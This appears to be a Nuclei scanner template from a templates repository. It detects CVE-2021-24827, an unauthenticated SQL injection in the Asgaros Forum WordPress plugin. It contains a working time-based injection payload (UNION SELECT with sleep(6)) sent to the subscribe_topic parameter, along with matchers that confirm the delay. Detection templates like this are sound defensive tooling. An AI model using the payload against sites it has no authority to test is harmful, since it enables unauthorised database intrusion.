nuclei-templates/cves/2021/CVE-2021-24827.yaml

34 lines
1.1 KiB
YAML
Raw Normal View History

2022-12-08 08:50:03 +00:00
id: CVE-2021-24827
info:
name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
reference:
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
- https://wordpress.org/plugins/asgaros-forum/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
classification:
cve-id: CVE-2021-24827
metadata:
2022-12-08 09:03:38 +00:00
verified: true
tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,asgaros-forum,unauth
2022-12-08 08:50:03 +00:00
requests:
- raw:
- |
@timeout: 15s
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
2022-12-08 09:03:38 +00:00
- 'contains(body, "asgarosforum")'
condition: and